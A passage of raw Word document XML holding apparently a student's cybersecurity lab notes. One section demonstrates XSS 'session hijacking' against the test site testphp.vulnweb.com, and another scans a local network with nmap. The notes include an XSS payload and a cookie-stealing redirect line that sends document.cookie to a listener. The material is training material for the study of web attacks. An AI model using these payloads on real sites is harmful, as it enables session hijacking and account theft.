          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve"> DAY -5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Session hijacking attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Step -1 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to browser and search </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Crosssite scripting clean sheet </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Then select tags </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Then copy the code </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&lt;noscript&gt;&lt;img title="&lt;/noscript&gt;&lt;img src onerror=alert(1)&gt;"&gt;&lt;/noscript&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Step -2 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Then take a domain name and search it in new tab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Then paste the code in that site </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&lt;noscript&gt;&lt;img title="&lt;/noscript&gt;&lt;img src onerror=alert(1)&gt;"&gt;&lt;/noscript&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Then you will get a popup raised and gives 1 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">After that  again search for </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">That code this time remove alert(1) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">And replace it by  windows.location='http://127.0.0.1:1337/?cookie='+document.cookie' </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Step -5 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert("windows.location='http://127.0.0.1:1337/?cookie='+document.cookie'") ;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Step -6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>We got in popup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>A testphp.vulnweb.com + 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>testphp.vulnweb.com says</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>windows.location='http://127.0.0.1:1337/?cookie=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>'+document.cookie'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distL="0" distT="0" distB="0" distR="0">
            <wp:extent cx="5943212" cy="1958454"/>
            <wp:effectExtent l="0" t="0" r="635" b="3810"/>
            <wp:docPr id="1030"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 cstate="print"/>
                    <a:srcRect l="0" t="15859" r="0" b="40380"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm rot="0">
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943212" cy="1958454"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distL="0" distT="0" distB="0" distR="0">
            <wp:extent cx="3703045" cy="5097439"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1031"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0"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId3" cstate="print"/>
                    <a:srcRect l="0" t="3897" r="0" b="34158"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm rot="0">
                      <a:off x="0" y="0"/>
                      <a:ext cx="3703045" cy="5097439"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distL="0" distT="0" distB="0" distR="0">
            <wp:extent cx="5943537" cy="2060784"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="1032"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9"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId4" cstate="print"/>
                    <a:srcRect l="0" t="13418" r="0" b="40536"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm rot="0">
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943537" cy="2060784"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>DAY -6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Nmap checking connected devices to our network</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Step -1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Open kali linux </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Step -2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Open terminal and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Update sudo apt packages </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Step -3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Sudo su</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Step -4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Enter password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Step -5 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Enter cmnd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Apt update</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">It updates packages </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Step -6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Enter cmnd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Apt upgrade</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>packages are upgraded</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>step -7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Enter command </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap -Pn 192.168.0.0/24 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>To scan connected devices to our network</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> @kali)-[-]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>nmap 192.168.0.0/24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Starting Nmap 7.94 (https://nmap.org ) at 2023-07-18 14:34 IST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Nmap done: 256 IP addresses (0 hosts up) scanned in 105.08 seconds</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>nected devices to our network</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
